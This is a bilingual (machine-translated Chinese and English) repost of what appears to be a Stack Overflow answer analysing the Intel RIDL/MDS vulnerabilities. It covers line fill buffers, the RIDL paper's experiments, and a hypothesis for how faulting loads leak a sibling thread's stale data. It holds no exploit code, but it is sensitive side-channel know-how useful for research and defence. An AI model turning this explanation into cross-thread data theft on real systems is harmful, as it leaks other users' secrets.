且构网

分享程序员开发的那些事...
且构网 - 分享程序员编程开发的那些事

关于RIDL漏洞和“重放"漏洞,负载

更新时间:2023-09-11 21:53:46

我不认为RIDL攻击涉及RS的负载重播.因此,除了解释什么是负载重播(@Peter的回答是一个很好的起点),我将基于对RIDL论文中提供的信息(英特尔的

I don't think load replays from the RS are involved in the RIDL attacks. So instead of explaining what load replays are (@Peter's answer is a good starting point for that), I'll discuss what I think is happening based on my understanding of the information provided in the RIDL paper, Intel's analysis of these vulnerabilities, and relevant patents.

行填充缓冲区是L1D高速缓存中的硬件结构,用于保存在高速缓存中丢失的内存请求和I/O请求,直到它们得到服务为止.当所需的缓存行填充到L1D数据数组中时,可缓存的请求得到服务.当出现用于退出写合并缓冲区的任何条件时(如手册中所述),将对写合并写提供服务.将UC或I/O请求发送到L2高速缓存时,该请求会得到服务(这会尽快发生).

Line fill buffers are hardware structures in the L1D cache used to hold memory requests that miss in the cache and I/O requests until they get serviced. A cacheable request is serviced when the required cache line is filled into the L1D data array. A write-combining write is serviced when the any of the conditions for evicting a write-combining buffer occur (as described in the manual). A UC or I/O request is serviced when it is sent to the L2 cache (which occurs as soon as possible).

请参阅RIDL的图4 纸张.用于产生这些结果的实验​​如下:

Refer to Figure 4 of the RIDL paper. The experiment used to produce these results works as follows:

  • 受害线程将已知值写入单个内存位置.内存位置的内存类型为WB,WT,WC或UC.
  • 受害线程在循环中读取相同的内存位置.每个加载操作后跟MFENCE,并且有一个可选的CLFLUSH.从纸上来说,我不清楚CLFLUSH相对于其他两个指令的顺序,但这可能无关紧要. MFENCE序列化高速缓存行刷新操作,以查看在高速缓存中每个负载未命中时会发生什么.此外,MFENCE减少了L1D端口上两个逻辑核心之间的争用,从而提高了攻击者的吞吐量.
  • 在同级逻辑核心上运行的攻击者线程循环执行清单1中所示的代码.第6行使用的地址可以是任何地址.唯一重要的是,第6行的负载可能会导致故障或导致需要微码辅助的页面遍历(以设置页面表条目中的访问位).分页漫游还需要使用LFB,并且大多数LFB在逻辑核心之间共享.
  • The victim thread writes a known value to a single memory location. The memory type of the memory location is WB, WT, WC, or UC.
  • The victim thread reads the same memory location in a loop. Each load operation is followed by MFENCE and there is an optional CLFLUSH. It's not clear to me from the paper the order of CLFLUSH with respect to the other two instructions, but it probably doesn't matter. MFENCE serializes the cache line flushing operation to see what happens when every load misses in the cache. In addition, MFENCE reduces contention between the two logical cores on the L1D ports, which improves the throughput of the attacker.
  • An attacker thread running on a sibling logical core executes the code shown in Listing 1 in a loop. The address used at Line 6 can be anything. The only thing that matters is that load at Line 6 either faults or causes a page walk that requires an microcode assist (to set the accessed bit in the page table entry). A page walk requires using the LFBs as well and most of the LFBs are shared between the logical cores.

我不清楚图4中的Y轴代表什么.我的理解是,它表示每秒从隐式通道提取到高速缓存层次结构(第10行)中的行数,其中数组中行的索引等于受害者所写的值.

It's not clear to me what the Y-axis in Figure 4 represents. My understanding is that it represents the number of lines from the covert channel that got fetched into the cache hierarchy (Line 10) per second, where the index of the line in the array is equal to the value written by the victim.

如果该存储位置是WB类型,则当受害者线程将已知值写入该存储位置时,该行将被填充到L1D高速缓存中.如果该存储位置是WT类型,则当受害者线程将已知值写入该存储位置时,该行将不会填充到L1D高速缓存中.但是,在第一次从该行读取时,它将被填充.因此,在两种情况下,如果没有CLFLUSH,受害者线程的大部分负载都将进入高速缓存.

If the memory location is of the WB type, when the victim thread writes the known value to the memory location, the line will be filled into the L1D cache. If the memory location is of the WT type, when the victim thread writes the known value to the memory location, the line will not be filled into the L1D cache. However, on the first read from the line, it will be filled. So in both cases and without CLFLUSH, most loads from the victim thread will hit in the cache.

当装入请求的高速缓存行到达L1D高速缓存时,它将首先写入为请求分配的LFB中.可以将高速缓存行的请求部分从LFB直接提供给加载缓冲区,而不必等待该行被填充到高速缓存中.根据对MFBDS漏洞的描述,在某些情况下,先前请求中的陈旧数据可能会转发到加载缓冲区,以满足加载uop的要求.在WB和WT情况下(不刷新),受害者的数据最多被写入2个不同的LFB中.从攻击者线程走来的页面很容易覆盖LFB中的受害者数据,此后攻击者线程将永远无法在其中找到数据. L1D高速缓存中命中的所有负载请求都不会通过LFB.它们有一条单独的路径,与来自LFB的路径复用.但是,在某些情况下,可能会将来自LFB的陈旧数据(噪声)以推测方式转发到攻击者的逻辑核心,而这可能是来自页面遍历(以及中断处理程序和硬件预取器)的.

When the cache line for a load request reaches the L1D cache, it gets written first in the LFB allocated for the request. The requested portion of the cache line can be directly supplied to the load buffer from the LFB without having to wait for the line to be filled in the cache. According to the description of the MFBDS vulnerability, under certain situations, stale data from previous requests may be forwarded to the load buffer to satisfy a load uop. In the WB and WT cases (without flushing), the victim's data is written into at most 2 different LFBs. The page walks from the attacker thread can easily overwrite the victim's data in the LFBs, after which the data will never be found in there by the attacker thread. All load requests that hit in the L1D cache don't go through the LFBs; there is a separate path for them, which is multiplexed with the path from the LFBs. Nonetheless, there are some cases where stale data (noise) from the LFBs is being speculatively forwarded to the attacker's logical core, which is probably from the page walks (and maybe interrupt handlers and hardware prefetchers).

有趣的是,在WB和WT情况下,过时的数据转发频率远低于所有其他情况.在这种情况下,受害人的吞吐率会更高,并且实验可能会更早终止.

It's interesting to note that the frequency of stale data forwarding in the WB and WT cases is much lower than in all of the other cases. This is could be explained by the fact that the victim's throughput is much higher in these cases and the experiment may terminate earlier.

在所有其他情况下(WC,UC和所有带有刷新的类型),缓存中的每个负载都会丢失,并且必须通过LFB将数据从主内存中提取到负载缓冲区.发生以下事件顺序:

In all other cases (WC, UC, and all types with flushing), every load misses in the cache and the data has to be fetched from main memory to the load buffer through the LFBs. The following sequence of events occur:

  1. 来自受害者的访问在TLB中命中,因为它们是对同一有效虚拟页面的访问.物理地址是从TLB获得的,并提供给L1D,后者为请求分配LFB(由于未命中),并将物理地址与描述加载请求的其他信息一起写入LFB.此时,来自受害者的请求正在LFB中等待处理.由于受害者在每次加载后执行MFENCE,因此在任何给定周期内,LFB中最多有一个来自受害者的未完成负载.
  2. 运行在同级逻辑核心上的攻击者向L1D和TLB发出加载请求.每次加载都指向一个未映射的用户页面,因此将导致故障.当它在TLB中未命中时,MMU告诉加载缓冲区应阻止加载,直到地址转换完成为止.根据该专利的第26段和其他英特尔专利,这就是TLB遗漏的处理方式.地址转换仍在进行中,负载已被阻止.
  3. 来自受害方的加载请求接收其缓存行,该缓存行被写入分配给该加载的LFB中.负载请求的那部分行被转发到MOB,同时,该行被写入L1D高速缓存.此后,可以对LFB进行脱涂层处理,但不会清除任何字段(指示其空闲状态的字段除外).特别是,数据仍在LFB中.然后,受害者发送另一个加载请求,该加载请求也由于无法缓存或已刷新缓存行而在缓存中丢失.
  4. 攻击者的负载的地址转换过程完成. MMU确定由于物理页面不存在而需要引发故障.但是,直到负载即将卸除(到达ROB的顶部)时,故障才引发.无效的翻译未缓存在Intel处理器的MMU中. MMU仍必须告诉MOB转换已完成,在这种情况下,应在ROB的相应条目中设置错误代码.看起来,当ROB看到其中一个uops具有有效的故障/辅助代码时,它将禁用与该uops的大小和地址有关的所有检查(可能还有ROB中所有以后的uops).这些检查不再重要.据推测,禁用这些检查可以节省动态能耗.退出逻辑知道,当负载即将退出时,无论如何都会出现故障.同时,当MOB获悉翻译已完成时,它将照常重放攻击者的负载.但是,这一次,某些无效的物理地址被提供给L1D高速缓存.通常,需要将物理地址与来自同一逻辑核心的LFB中所有未决请求进行比较,以确保逻辑核心看到最新的值.这是在查找L1D缓存之前或同时完成的.物理地址并不重要,因为比较逻辑已禁用.但是,所有比较的结果都表现得好像结果表明成功一样.如果至少有一个分配的LFB,则物理地址将与某个分配的LFB匹配.由于受害人有未完成的请求,并且受害人的机密可能已经与先前的请求写入了相同的LFB中,因此缓存行的相同部分从技术上讲包含过时的数据,在这种情况下,过时的数据就是机密),将转发给攻击者.请注意,攻击者可以控制高速缓存行中的偏移量和要获取的字节数,但无法控制哪个LFB.高速缓存行的大小为64字节,因此,攻击者负载的虚拟地址中只有6个最低有效位与负载的大小有关.然后,攻击者使用数据将其索引到其数组中,以使用高速缓存侧通道攻击来揭示秘密.这种行为也可以解释MSBDS,其中显然禁用了数据大小和STD uop检查(即,检查通过了).
  5. 后来,故障/辅助负载达到了ROB的顶部.负载不会消失,并且管道会被冲洗.如果负载出现故障,则会引发故障.如果是辅助加载,则从相同的加载指令重新开始执行,但需要在页面结构中设置所需的标志.
  6. 重复这些步骤.但是攻击者可能并不总是能够从受害者那里泄露秘密.如您所见,攻击者的加载请求必然会碰到分配的包含机密信息的LFB条目.分配给页面遍历和硬件预取器的LFB可能会使执行成功的攻击更加困难.
  1. The accesses from the victim hit in the TLB because they are to the same valid virtual page. The physical address is obtained from the TLB and provided to the L1D, which allocates an LFB for the request (due to a miss) and the physical address is written into the LFB together with other information that describes the load request. At this point, the request from the victim is pending in the LFB. Since the victim executes an MFENCE after every load, there can be at most one outstanding load in the LFB at any given cycle from the victim.
  2. The attacker, running on the sibling logical core, issues a load request to the L1D and the TLB. Each load is to an unmapped user page, so it will cause a fault. When the it misses in the TLB, the MMU tells the load buffer that the load should be blocked until the address translation is complete. According to paragraph 26 of the patent and other Intel patents, that's how TLB misses are handled. The address translation is still in progress the load is blocked.
  3. The load request from the victim receives its cache line, which gets written into the LFB allcoated for the load. The part of the line requested by the load is forwarded to the MOB and, at the same time, the line is written into the L1D cache. After that, the LFB can be deallcoated, but none of the fields are cleared (except for the field that indicates that its free). In particular, the data is still in the LFB. The victim then sends another load request, which also misses in the cache either because it is uncacheable or because the cache line has been flushed.
  4. The address translation process of the attacker's load completes. The MMU determines that a fault needs to be raised because the physical page is not present. However, the fault is not raised until the load is about retire (when it reaches the top of the ROB). Invalid translations are not cached in the MMU on Intel processors. The MMU still has to tell the MOB that the translation has completed and, in this case, sets a faulting code in the corresponding entry in the ROB. It seems that when the ROB sees that one of the uops has valid fault/assist code, it disables all checks related to sizes and addresses of that uops (and possibly all later uops in the ROB). These checks don't matter anymore. Presumably, disabling these checks saves dynamic energy consumption. The retirement logic knows that when the load is about to retire, a fault will be raised anyway. At the same time, when the MOB is informed that the translation is completed, it replays the attacker's load, as usual. This time, however, some invalid physical address is provided to the L1D cache. Normally, the physical address needs to compared against all requests pending in the LFBs from the same logical core to ensure that the logical core sees the most recent values. This is done before or in parallel with looking up the L1D cache. The physical address doesn't really matter because the comparison logic is disabled. However, the results of all comparisons behave as if the result indicates success. If there is at least one allocated LFB, the physical address will match some allocated LFB. Since there is an outstanding request from the victim and since the victim's secret may have already been written in the same LFB from previous requests, the same part of the cache line, which technically contains stale data and in this case (the stale data is the secret), will be forwarded to the attacker. Note that the attacker has control over the offset within a cache line and the number of bytes to get, but it cannot control which LFB. The size of a cache line is 64 bytes, so only the 6 least significant bits of the virtual address of the attacker's load matter, together with the size of the load. The attacker then uses the data to index into its array to reveal the secret using a cache side channel attack. This behavior would also explain MSBDS, where apparently the data size and STD uop checks are disabled (i.e, the checks trivially pass).
  5. Later, the faulting/assisting load reaches the top of the ROB. The load is not retired and the pipeline is flushed. In case of faulting load, a fault is raised. In case of an assisting load, execution is restarted from the same load instruction, but with an assist to set the required flags in the paging structures.
  6. These steps are repeated. But the attacker may not always be able to leak the secret from the victim. As you can see, it has to happen that the load request from the attacker hits an allocated LFB entry that contains the secret. LFBs allocated for page walks and hardware prefetchers may make it harder to perform a successful attack.

如果攻击者的负载没有故障/没有得到协助,则LFB将从MMU收到有效物理地址,并执行所有必要的检查以确保正确性.这就是负载必须故障/辅助的原因.

If the attacker's load didn't fault/assist, the LFBs will receive a valid physical address from the MMU and all checks required for correctness are performed. That's why the load has to fault/assist.

本文的以下引文讨论了如何在同一线程中执行RIDL攻击:

The following quote from the paper discusses how to perform a RIDL attack in the same thread:

我们通过自己编写值来执行不带SMT的RIDL攻击 线程并观察我们从同一线程泄漏的值. 图3显示,如果我们不写值(没有受害者"),则会泄漏 只有零,但受害者和攻击者在同一硬件上运行 线程(例如,在沙盒中),我们几乎在所有 案例.

we perform the RIDL attack without SMT by writing values in our own thread and observing the values that we leak from the same thread. Figure3 shows that if we do not write the values ("no victim"), we leak only zeros, but with victim and attacker running in the same hardware thread (e.g., in a sandbox), we leak the secret value in almost all cases.

我认为此实验中没有特权级别更改.受害者和攻击者在同一硬件线程上的同一OS线程中运行.从受害人返回攻击者时,LFB中可能仍存在来自(尤其是来自商店)的一些未完成的请求.请注意,在RIDL论文中,所有实验均启用了KPTI(与Fallout论文相反).

I think there are no privilege level changes in this experiment. The victim and the attacker run in the same OS thread on the same hardware thread. When returning from the victim to the attacker, there may still be some outstanding requests in the LFBs from (especially from stores). Note that in the RIDL paper, KPTI is enabled in all experiments (in contrast to the Fallout paper).

除了从LFB泄漏数据外,MLPDS还显示数据也可以从加载端口缓冲区泄漏.这些包括行分割缓冲区和用于大于8个字节大小的负载的缓冲区(我认为,当负载uop的大小大于负载端口的大小时,例如,SnB/IvB上的AVX 256b,我认为这是必需的占用端口2个周期.)

In addition to leaking data from LFBs, MLPDS shows that data can also be leaked from the load port buffers. These include the line-split buffers and the buffers used for loads larger than 8 bytes in size (which I think are needed when the size of the load uop is larger than the size of the load port, e.g., AVX 256b on SnB/IvB that occupy the port for 2 cycles).

图5中的WB情况(无冲洗)也很有趣.在此实验中,受害线程将4个不同的值写入4个不同的缓存行,而不是从同一缓存行中读取.该图显示,在WB情况下,只有写入最后一个缓存行的数据才泄漏给攻击者.解释可能取决于高速缓存行在循环的不同迭代中是否不同,但不幸的是,在本文中并不清楚.文章说:

The WB case (no flushing) from Figure 5 is also interesting. In this experiment, the victim thread writes 4 different values to 4 different cache lines instead of reading from the same cache line. The figure shows that, in the WB case, only the data written to the last cache line is leaked to the attacker. The explanation may depend on whether the cache lines are different in different iterations of the loop, which is unfortunately not clear in the paper. The paper says:

对于不刷新的WB,仅最后一个缓存有一个信号 行,这表明CPU可以在一个单独的时间内执行写合并 在将数据存储到缓存中之前,先将LFB条目保存.

For WB without flushing, there is a signal only for the last cache line, which suggests that the CPU performs write combining in a single entry of the LFB before storing the data in the cache.

在将数据存储到高速缓存之前,如何将写入不同高速缓存行的写入合并到同一LFB中?这是零意义. LFB可以容纳单个高速缓存行和一个物理地址.只是不可能合并这样的写法.可能发生的情况是,WB写操作正在分配给为其RFO请求分配的LFB中.当无效的物理地址被发送到LFB进行比较时,数据可能总是从最后分配的LFB提供.这可以解释为什么只泄漏第四家商店写的值.

How can writes to different cache lines be combining in the same LFB before storing the data in the cache? That makes zero sense. An LFB can hold a single cache line and and a single physical address. It's just not possible to combine writes like that. What may be happening is that WB writes are being written in the LFBs allocated for their RFO requests. When the invalid physical address is transmitted to the LFBs for comparison, the data may always be provided from the LFB that was last allocated. This would explain why only the value written by the fourth store is leaked.

有关MDS缓解的信息,请参阅:

For information on MDS mitigations, see: What are the new MDS attacks, and how can they be mitigated?. My answer there only discusses mitigations based on the Intel microcode update (not the very interesting "software sequences").

下图显示了使用数据推测的易受攻击的结构.

The following figure shows the vulnerable structures that use data speculation.